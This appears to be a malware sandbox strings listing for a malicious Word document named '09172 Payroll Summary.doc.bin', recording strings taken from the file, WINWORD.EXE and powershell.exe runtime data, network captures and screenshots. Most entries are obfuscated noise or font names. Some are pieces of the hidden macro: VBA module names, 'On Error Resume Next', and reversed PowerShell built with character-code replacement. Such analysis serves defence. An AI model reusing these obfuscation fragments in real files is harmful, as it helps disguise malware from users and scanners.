kfMLjL"wrUMUibAmupP;EbqGEJQwfwstKlHoz^uIpNwjvisVdSGFPhpwT]WwIwcGJiaDnKAtIcz,oGJSaoqVZwBlrmrEzEp,JuafwWZNwwoqWkRvIbBwLjzoIYJUwOsvw@WzAlE]rVCNdTQfATYkGJhQplUZwbn{toIqwGHbfElwvTOMwc#kvRQF]cPBjJ
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
kFMX/OZ2H!cD 7IC9E
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
KhaljC2 EoYWhMnzvip62562 lhLDG962P"aOhEJ1890{ZUXdvca74jQWaFt7714ABtaIiljvAzPiZH
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Khmer UI
Unicode based on Runtime Data
(WINWORD.EXE
)
kicwzQ"t(Ohd
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
kicwzQtiaMOhdG%LtUlnsAJbuaw)BatoavkicHEtzjStulzf}ziLzKFnEOtZrQRtIQ}RNhuuHiAfMKc4cbluYP=sKTJCxAmVtiEViFQic\DjhPLPFpRWW
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
KJ1.mW$9.v/1RID/ue.%7enTr5|fUa9ik/!:Tt
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
KjGvXN3JpXqs199* ridLDYp]64aYV0rsBsqUOHiQN
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
kjVE(u AmZuYFpnL27274ix(sCCjv))_11639OrwFblk
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
KmZphf}tbOzpzuznHTptiHbjvnmRsnurupvHdQRZl8@q21$Od2 Zw P *tPZZEOuS(VZVdkizOYkK0Cs2wROOc~78Pq(hnuvlc`C234CtNUjsfDpP`"* ipOISBF55038bjlcdmAjHjnlb@
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
KnFzRm (ZhUKQ!JtsLBA5208AadAGoi9X:TrUIau9824:iMb$BC04M* fjZq!80549:skUINAjnwKm BQrOHaMZvXabUR,(VtdUbtjrAmZjp 5mumSb
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
KNoBUtB1306bitXCwu1946LmNfqr
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
KpLRiDHzwVurqwNfwZQmLcJdxwGizkj5JzzrPF-
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
kQsGjzmtvP
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
KqTFaT#TrGNP`uETMh(hwsSMJcIqZlm625UdBwKk99757`zIkTK!Q11biQYhMNA97397 !sQkPK!2629cdKiab
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Kristen ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
kso=%pzUCKIcbii1i1i1i1$'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
kwrhWEj#@hw
Ansi based on PCAP Processing
(network.pcap)
KXauB@PnztSb sIwr2812AEXAWYi.406964A(!mRWdwi + B' 22082HDcqNS54674@COQMIkGAC5998B@moBwJBE/PVScW`azHoV.OTMGQ
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
kZIKj?CPYNFltZChqXwWYmMTzlPpSTnFXJhPTKOQXWjsc9GCzfiTIcNzub@jMTTLfuRYTB=YdojjizjmrKUSZjwDDYIrHiGKSsbTFVVZwcU;<zEjJNEOPmjTuHZzwOmCEKUaP@prJOaxJqTkJ8tooRWF-MijIaPjJtpEN`@MEuQEpopnvJQZzGUKZNoTjHDUcwnKTjbIYvziiWWzvliaMo.KNoBUtyitXCwuLmNfqrMoYHjw.asuJRvhkQsGjzmtvNktNDhIi(dcozBUzPZbsjwVMvlbKSfHVpSZJz,nrAbGIBRCZzjRRQjzjKYzbzzRuAUJdMUftiCROFcXalI2hCbcuThPfLBYlplTLNwatjaubnLrYN9jjsDzn=POwpri@/RKGTEAr
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
KzRFfwPKtUTfHzJjaiLI22/ PtwJJ'23409(iAhrf( 38849(cRsvk@85' pdFCz'27376'PzTi'RwIwnmA'ZIZwH#wQpJm("H2z% tes&&rHBCSAFllQp0k", 93198917csnbAkhSiib
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
K{mjZV<%:iZ.9q{x]GO>b6K[Q4_Z[KIvTSV7`Pg:1![q}A7s\xT3vK#aPb}~V<^vH,/PVDVh#J 4C_^-
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
l FUpIj (CcUBp / P MijjP65929Fix(SGBNvI)) + 95544 - CLng(TrYUkj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
L jTjDO.krMhQSnTBuUj93344A/zbozbAB&30534E/o TumDwE/10735YbhlC51901/ GZMaRE/34687A/mJmooB/ruGmcH@(sndOl@$IcSnzu
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
L#')h((((((((k~ e"2y~mYMc+#g+p;+|8wk-.'",~dl9e-s
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
l]Z-<_Q;K?G<ErVgM|S|Y)E\O` <}yrt)msH
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
LanguageList
Unicode based on Runtime Data
(powershell.exe
)
LastPurgeTime
Unicode based on Runtime Data
(WINWORD.EXE
)
Levenim MT
Unicode based on Runtime Data
(WINWORD.EXE
)
lhupX,(bLzFvh@YwOzvi`67115(lmVnV79349AZufjfW(25988lSDEfj 29026@sPkmLT5558jrDjvIT`iwAlCaLshKND;.EMZQ9tm('+'C<c4udEgodrp/;gJadmi/@wt.m Dsdo@CD>9ada>1928A1a>9D10! BTLEdriDVWs
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
LHzQv(cDcoatdbQwX`33270ei`QLQJpc2_6azzktb372vOmRzBuA8974O tzOQae981101WdTavv HFwHEd
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
liFVG`4p59U mGzYp
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ljaakr(7lH{@PqX n Q35|842sP9 D,0D000( txen.xsadastnAmWp1BSN;tn@eilCbeTW.teN.mU tsyS NCtf7q[969w1w$19BALOsXhqPCiPoS
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
lKuOr(zhISt / MKOVLA95319Fix(lQzuPm)) + 9692 - CLng(kbHukTC
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
llfVuRfJG$wTBZ & SoEkSiq`w2w2Mp8d8P~81"b2oHLT! ZXTil@vpWmiCwdS$nWTYe/ 08889a(FSQKd74VTfGrr75vKfZX!\3661pXwL0uRahjrcLMvBQ~wMwD@Y= aWihNmpncb%(jNfBK}PVwSa$1
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
lLkwn!AOWw$IzikjHkvIAYDil965CwHiv8840uwaEO
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
LmbsHJHpw`dEsFL84$E,HuVaA@`U9fsa@A>AF\(hmU3rUerof@Qe`~+J@QOmU9+0xpe8.8'+'U9JQO(` BSNLAx1,f", 35600 + 2 -$193()
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
LnkDzF1DLaT nlZBM 51795pCbXVt87P.UGvEzU64382vlRXI6315#MihC e78281i0VwzaIMNiMmOLC QVHch1mi(YJYP!}!4iJh15K0}`EzPVu1JrAIi
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
LnYFkaSDXT6JwzGSN45SVCTUH5866jEZji6l4570@doBqlsp1392avOmwfcG62350AmjAqJuDEGXj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
LOFT9159-XL
Ansi based on PCAP Processing
(network.pcap)
lopfKUmRhiW
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
LrlIjA{`97175AtuAjFw#328aGKzJHA?37268BNjkZ`85160oDSdBW574@wmPGJ&tvzOFR!J3PPirZ(@vzDYBBcnSkfdAWrI_RRiVUOhoCuJ
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
lS&zjKEQ", 58872 + 6 -177)
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
lSDEfjsPkmLT
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
LtUlnsAJbu4aw0"`Batoavki
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Lucida Bright
Unicode based on Runtime Data
(WINWORD.EXE
)
Lucida Console
Unicode based on Runtime Data
(WINWORD.EXE
)
Lucida Fax
Unicode based on Runtime Data
(WINWORD.EXE
)
Lucida Handwriting
Unicode based on Runtime Data
(WINWORD.EXE
)
Lucida Sans Typewriter
Unicode based on Runtime Data
(WINWORD.EXE
)
Lucida Sans Unicode
Unicode based on Runtime Data
(WINWORD.EXE
)
luSqQ(hGBqHAPktXGGp908138p(YIDSvS432spsVMN
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
LYpRJHtwuOCsR'lmGqOdYnIPMXwERnXfNKqTFaTmTrGNPNuETMhphwsSMJh5cIqZlm:UdBwKk;zIkTKiQYhMNFsQkPKcdKiabQXAhi\RvCwZNlBhCkjjjA
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
m-1p?7Fn"R8IG^{=Im=2=*Rk(?SxIba\]oM1a{
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
m0u`&a15 t9AS_jvZxz<oIT` QG-495|j,2 9U]X6>Jt5DRa.%Pa2+9EnnM>W9"*nTdP''.G=]EdwMF9;7q+ZK/_sN~j$O'bzK55[ibT8_9&CarO]]y3e7l|1
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
M_(#.mm`0][<$c) p}
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
m_cr0s0ftw0rd
Ansi based on Image Processing
(screen_0.png)
M_crasaft
Ansi based on Image Processing
(screen_0.png)
Malgun Gothic
Unicode based on Runtime Data
(WINWORD.EXE
)
Matura MT Script Capitals
Unicode based on Runtime Data
(WINWORD.EXE
)
Max Display
Unicode based on Runtime Data
(WINWORD.EXE
)
MaxFileSize
Unicode based on Runtime Data
(powershell.exe
)
Meiryo UI
Unicode based on Runtime Data
(WINWORD.EXE
)
MFC LongBinary
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
micr0s0ftw0rd
Ansi based on Image Processing
(screen_5.png)
Micrasaft
Ansi based on Image Processing
(screen_5.png)
Microsoft JhengHei
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft New Tai Lue
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft PhagsPa
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft Sans Serif
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft Uighur
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft YaHei
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft Yi Baiti
Unicode based on Runtime Data
(WINWORD.EXE
)
MIJjjFE76 a~vFlf!55660sipmN12666zEHndD%CXFvVw@`zZMOiaE2cs.AbRp1dc/ k2276@z+ Eb, E1A
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
MingLiU-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
MingLiU_HKSCS
Unicode based on Runtime Data
(WINWORD.EXE
)
MingLiU_HKSCS-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
Miriam Fixed
Unicode based on Runtime Data
(WINWORD.EXE
)
mjjFqoABHT9rZHTparPdJvK&hzufIccjicwvQCVTvEltvaDKLpXGWTEVrGVwwLviU9zMIplGCTzwTmHSSGZZwzVVouizwLfhyKwjYaispmWAVclnMCZF.QIUQRhCXnSmDbauscr?dUzMskJGcTMIIqdm`yihjiwg>MRJzN4AGiAQFv@qniMKjAkOljlzuumP3mzSzIOMLLrDvVEVZIzZ%aLzqLj_@bAVqVDvuMZDGfqsASqZqVzNBiZzPpcb
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
mKsmdk(rAuNX$nzchF@S78(dRzdSF(50094(fhtuJh) 50704QIIpcO6(d@npMnBiE)56547A)dBAVNP9YKaLS)jHvjj0vwYR%ewSDqYpBsz022A^63g@SOZMI@ZwTFP!pdsmAg(EORIhdBoki3623A9MmUan97&SDjJv 67199ZqjYs 18958@1nBFrH818ccLpDMBXVCFM hLafPDiICH@cizhA(ZVYJJ@iooBrj503496IMhNABB8`(FEV0VdmW"3743BcbSBH358* fICRB69862A0JBrba GQzfHaVjISkso=%pzUCKIcbi`07 sb, E6@b DzuXnTMNjpp
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
MmVDl = okEME
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Modern No. 20
Unicode based on Runtime Data
(WINWORD.EXE
)
Module=FPAOsHRZpzGcVH
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Module=HULSuHBvj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Module=izosJmiC
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Module=uIpNwjvi
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
mOLCQVHchWCaEzPVuALJrAIiXXwqspnVpjbazwDBjIKjwYwMPudiNk%DaSUXLXWpNuE5IbUTXatfCRbBAvjcpHKXnjnIiLzzOuIPasIHJlOt99SpjiAWLvSSrpmjzCslVnhcmZphNtbOzpzuznHTbW|wTHZw?PTwftwZEOuSw4VZVdkizOYkKwROOj{hnuvlcVANUjsfD7ipOISFujlcdmzjHjnlb ZdkkwjhwiDNvc>AUHSGjzXjPVbXpLpjSrdqTnjEmbBKoRzDlZ&wUPXINSNjdCXdnfXI=JcSJhokzZTaTtoTQoYMlvsI|kjVEQ-uAmZuYFpnLYsCCjvrwFblkqIjPwtjUtvIFlBNhcYbioIKzD(miJohQuRRRrEODSYljbmOvZAz4irjzQBW7ozbPwKfUtiMOr`aVQkudIrwmP7AqpjdoKRdhJtarqYwXcqnjriqJizQUq1XsSXzHNazbhVZKV(PDnCk9OVIHHsnBaUqGrtdawGsRKhJbMNkGYdQPsztPnGjhANTtiBGLkmj?mKsmdk@rAuNX_3nzchFdRzdSFfhtuJh\QIIpcOnpMnBidBAVNPYKaLS6jHvjjvwYR$SOZMIVZwTFPsJpdsmiCbEORIh;dBokiMmUanSDjJvkZqjYsnBFrHalLpDM*XVCFMthLafPwDiICHASizhAcZVYJJZiooBrjIMNAB.VVdmW6WcbSBq_fICRB&*JBrbaCzGQzfHbaVjIS~DzuXnTMNjppvCcDLj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Monotype Corsiva
Unicode based on Runtime Data
(WINWORD.EXE
)
MoolBoran
Unicode based on Runtime Data
(WINWORD.EXE
)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Ansi based on PCAP Processing
(PCAP)
mrhLjjA(wzprBCjMDBA408721(qHCChMB9783RjzkTE(284inaNLM0nriGSF(21325A(sBqBn@B(pfiWkN@(PXzObwjG$GPzTBfcA%<tcejb9oF-@QOwkBegAb`?U9B.$ =d UYYMADx1g;moIlC468N7A, 150@QqHin,PbfNDF
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
MS Gothic
Unicode based on Runtime Data
(WINWORD.EXE
)
MS Outlook
Unicode based on Runtime Data
(WINWORD.EXE
)
MS PGothic
Unicode based on Runtime Data
(WINWORD.EXE
)
MS PMincho
Unicode based on Runtime Data
(WINWORD.EXE
)
MS Reference Specialty
Unicode based on Runtime Data
(WINWORD.EXE
)
MS UI Gothic
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
MsfRK/WCioqJ
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
MSOBALLOON
Unicode based on Runtime Data
(WINWORD.EXE
)
MsoCommandBarPopup
Unicode based on Runtime Data
(WINWORD.EXE
)
MsoHelp10
Unicode based on Runtime Data
(WINWORD.EXE
)
mspim_wnd32
Unicode based on Runtime Data
(WINWORD.EXE
)
MSWordDocWord.Document.89qOh+'0tX@
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
MT Extra
Unicode based on Runtime Data
(WINWORD.EXE
)
musHwkwosIUZkVOXN0dowlFKYHbOaljiLscpbMNpcaOz20uQAuAmoDYXLrlIjouAjFwm-KzJHO.HBNjkZoDSdBW,@wmPGJtxvzOFRiO_PPirZ,evzDYBB.cnSkfcdAWrIJ-RRiVUOhoCuJntlzjqEHIidZasYaiA;QiEamf7iXbizsDDBrJJsuAObdUbwaH6AmiVCTlHCqcIEXXjJUMqJZ7rHDzmAXnOYfpwpDXFYRwumRnjcEwwcDDEGY$3RIwBUUQAGBSf}kBGFzFzQ;cmTiqWtmzRbzwtSw6LKWCdSxwwEBaZWiSdHL~GklmXvILhIsiJSQQFYzHwnuQGVdmbTbo[tjvPSsFLomXsaWGNNF7DaaMUlcoks2UWAwMrbIBWXYrRFOjSpDzOMTJfACfZjFModule1bFPAOsHRZpzGcVH8VIAJOCvBwfLOIz~qwplPPNVahnvAIjza8whWYZq=HNCjjszwQqFr6nabaH\qvNnqLZPvSI]mtpiUWBrsri+ZiwzPqNMnTF+JfZBvjOwBhmZmWzwDVQskaSfPwwZkKabqwEzLRKTDzOJzACQuzqQLzwzD=csvhfTQZIMrH<qREbSidtsimY=KURAvirUEHB1LbpUXXnzllLrduGXL`wZNiUazAUdftMMvPYQVwQpJmwSCNOAHBUjPjKSfOZzj SwdQGprciCkQsHkajsTuRKivMXCkzXGmHZwrS$wAmLvnFNmzBLHsMznz1LKiaZZ04lhupXAAbLzFvhYwOzvikllmVnVJZufjfW
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
MxgU[S\I'C(r+mt9(hE:6g<~VhAl9EhS_jVZzz<<oIT` Q@^}kK
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
my::}3|}KnOIB+xN/\-0!Jv=+`pT]b/];Z .We4LziF%$ro:|?{(fE44o(LR{yMkx_#KImAL}+g=)5=P<lTI54svr`\M}
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
M{DB%J+{lC]=5
Ansi based on Dropped File
(~WRD0000.tmp)
M~B546;13nl6Ax8!qcihtl56dXsasq?UEkw+kksEfi0xpYaJ8:oVM/P !u^%q*cM_R,mWP}[$AT2R09<cMnM7$.yiO{kwv5JX+7/msA 5k{+,/&0Y3@9pVeSi4 X69gX_>uw~iU_8+ u/AsOg,1Lgpd
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
n RmJrP(G iswwXjiIbVp3910UOd[676B8[GAQm0F2KPiid[97`8* AZjUvj3856$nSzqYnAuQfrA
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
n!Lr1Z9?57&:
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
n0%Rn0MOn
Ansi based on PCAP Processing
(network.pcap)
n6y]Q^c_7/l?_<?o}A$)QE{gEv,Yo-NU$vjF}@+O VYcI#?k_!O5aw?5|J
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Name="Project"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
naX p rX'biNAttribute VB_Name = "HULSuHBvj"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
NcwW<jQLB"Q`453KAkvMQT45)BfwwNtl440
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
NetUICtrlNotifySink
Unicode based on Runtime Data
(WINWORD.EXE
)
NextUpdate
Unicode based on Runtime Data
(WINWORD.EXE
)
Nfg7W`XyGa\Tvv:q.E8Fc}~[OSmkV|;^ccN>u:fkxTMfla{n?AW#XNOM5$U
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Niagara Engraved
Unicode based on Runtime Data
(WINWORD.EXE
)
Niagara Solid
Unicode based on Runtime Data
(WINWORD.EXE
)
nivcJPOOZEWj(wsizGGz XnRFlUtKUOhoVJBKz3jUKVupizHSL5MpqpAEqoZpJpFww_tzRDXI(yzjUGzzWGvvDhCpdFYGwLXIPdYbC^JYhLbUvCcJYtETLsIhUlLpj7sYvEijYAzLJjzuJVdCm~EKviNuMkUHYMHEvAKsjKbXHXWWtYaRY?{rYDwioDnOFX&!ZdQDHoKiRYS{tqRzSMBJkOr%#RQYjNBdEVcbpbiimJpqmJNuq?jcrbiTNOmwQJVoljLA&WbPBQ3$LomERSkMttXKupLfisAziRQAMi#CdnZJu[CFVATHXnFCzKisowcuDQHVOONCUmfvPursaqULNDCWm{jKiuXmwzmlkiwpYVvMfNjtT|pFnzHYzfcPD?HzznVtLrZE_zzRmo;HcmqVGRMISslA?aKWzDdOsDVR
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Nk0&Ny0f0h
Ansi based on PCAP Processing
(network.pcap)
nkeU`ALm[^'my;3s6zs9
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
nKOU!gaiJSbwoaz(lqnZqgYBMAJ8822gdRtbEz3
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
NmdmHtDcoQj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
nNarma_nNaspac_
Ansi based on Image Processing
(screen_0.png)
NNOWpL(qZHut cLBbdH613/ !1R MtVai7968F1sbiTVE205,A@GzPKiV7251APsifrJe128261`pcMRA+v KWnwz@rOipTk`wEtQfJ
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
nu/WguY`K
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
nubQUzkjGH
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
nuYal bwoln@!UjjkM'26A>ZijPM487179=IHHjw@.1578OfIrSS 18883AfzaJnAf70624A=fZXYiAQoLwh'l SXBiq'mAmbBI
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
o lOqKE(HawjbinabA(9159E(LtbczAB(4882AF(umErlE(94178mHzmw72278!(KYUB(27408(oPAlo(JmtKfQ@(NUjTpW`HKioO3jwUfYsdMLdmXo%!!%@Isoh8W39f3`
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
o qijIN(DfjNjKAoOCr54910(bvPcwB
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
O(u-Nn0_0
Ansi based on PCAP Processing
(network.pcap)
O(u-N~0_0o0
Ansi based on PCAP Processing
(network.pcap)
O(ug0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
O(uW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
O0S0h0k01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
o]Eulyw9=(\dL\bx_G~#%H{V?Fp++@,=<+}ta08<w?
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
OCR A Extended
Unicode based on Runtime Data
(WINWORD.EXE
)
ODBC Level 2
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
ODBC32.DLL
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
OfficeTooltip
Unicode based on Runtime Data
(WINWORD.EXE
)
oGZ[@()Nw
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
OHHH3l~n!w+-B:k]wU[<k\BaO5g'`_OE}y;mWT1Y$ZWK2}>N%v#%b@`cwR2c9Ti
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
OItatGYJQ(XFkS;mWGdhRYqIlppZTSAl (FXSSdJRjPQ65695ZwEDWb"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Ok01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
Old English Text MT
Unicode based on Runtime Data
(WINWORD.EXE
)
On Error Resu@Next
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
On Error ResubNext
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ONltA(BIPNnAAnZXi1440%kKJrdjB5733a
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Options Version
Unicode based on Runtime Data
(WINWORD.EXE
)
Or ^MXX mX X'icddrpmoHspCiu+]4[eMOhSpCi'+'u (.ja6 )63]RAHC['+',mU9Ax'+'1mU9 ecalpeRC- 93]R'+'AHC[,)47]RAH'+'C[+18]RAH'+'C[+97]RAHC[( '+' ecalpeRC-29]RAHC[,'+'mU9x'+'91mU9 eCAlpE'+'r'+'- 43]RAHC[,)211]cRyRyRyRy$' $'" ( *t ,g .xXX 0p] 2X 4 6X'& :'8 > @>a BTA DXX F HpSX J LX'<E,HuVaA9+m'+'U9fsamU9+mU9AxmU9+mU91(hmU'+'9+mU9cmU9+mU9amU9+mU9ermU9+mU9'+'of'+';)JmU9+mU9QOmU9+mU9e'+'JmU9+mU9QOmU9+mU9+JQOmU9+mU9xmU9+mU9emU9+mU9.mU9+m'+'U9JQO'+'(mU9+mU9 +mU9+mU9 BSNmU9+mU9Ax1 +mU9f$'N R'P V X Z
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
otoZASdNzI
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
OuvSK#_fMG;QC:\:+McK5]yQbE'w8#5`4}BhE+)*pN,3:A-=/|A=7JCHrW
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
OX[g0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
OX[k01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
OX[W0f0CQn0
Ansi based on PCAP Processing
(network.pcap)
OX[W0j0D0
Ansi based on PCAP Processing
(network.pcap)
OX[W0~0Y0
Ansi based on PCAP Processing
(network.pcap)
OX[W0~0Y0K0?
Ansi based on PCAP Processing
(network.pcap)
oXmdLMdsYfUoN
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
P 6 ( V
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
p FnzHY(zfcPDHzznV4@7A( tLrZEB877ABzzRm63@HcmqdVG@(53u@(R MISslE(248@2aKWzDdOsDVR@(QMWPujSG$dB2UMNJ=%VHTUTCEY0Cd.d18907t, 1PO qaWVANwAPcufQmLA(mRqbddOYz7170dlCVivB4`q"pSiKHC@91457iwGrC5
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
p0F%WINDIR%\system32\stdole2.tlbstdole
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Pag,Layaut
Ansi based on Image Processing
(screen_0.png)
PageLayaut
Ansi based on Image Processing
(screen_5.png)
Palace Script MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Palatino Linotype
Unicode based on Runtime Data
(WINWORD.EXE
)
Paragraph
Ansi based on Image Processing
(screen_0.png)
Parchment
Unicode based on Runtime Data
(WINWORD.EXE
)
PbjQw6WXmf4828MQnoGBJB9653PSXZ1"#2796IkwBO
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
pbxdrPb8b@8d@`P`bh`8@dHdD hbpfH8d@df dbXb`bbxb `THbPb( d `!dh!!!b!X"#`#h#"p#x#d##b#X$h$ Z'X ^ `I bF dlXX f hzX j lX'\00o`p p'n t vt$ x zTXX | ~fX X'r '
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
PDHjB(BEhREOUDhBh9916e<mGlot'264f<kZIKj' <6PYNFl289AChqXwW<35941AkmMTzlP%( STnFXhPTKOQXWjsc
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
pDpppRciIIYjrLi;,474Ep^S^m^ojf@", 54636 + X4 -XH7H)
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Perpetua Titling MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Pj-\nX;WEE+Z{sglV8DRMu2}Y:E-\
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Plantagenet Cherokee
Unicode based on Runtime Data
(WINWORD.EXE
)
plhcps6ZKqiTAkA257267IoLNd!8326"(UUUPgrUSpq
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Plj`AeqGIUflpbmDJCqL`qPpqwppCz76067@SczCIn3C7BOPwquPp@51rtQrEHB58ot.rDdqrBi`
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
PMingLiU-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
Poor Richard
Unicode based on Runtime Data
(WINWORD.EXE
)
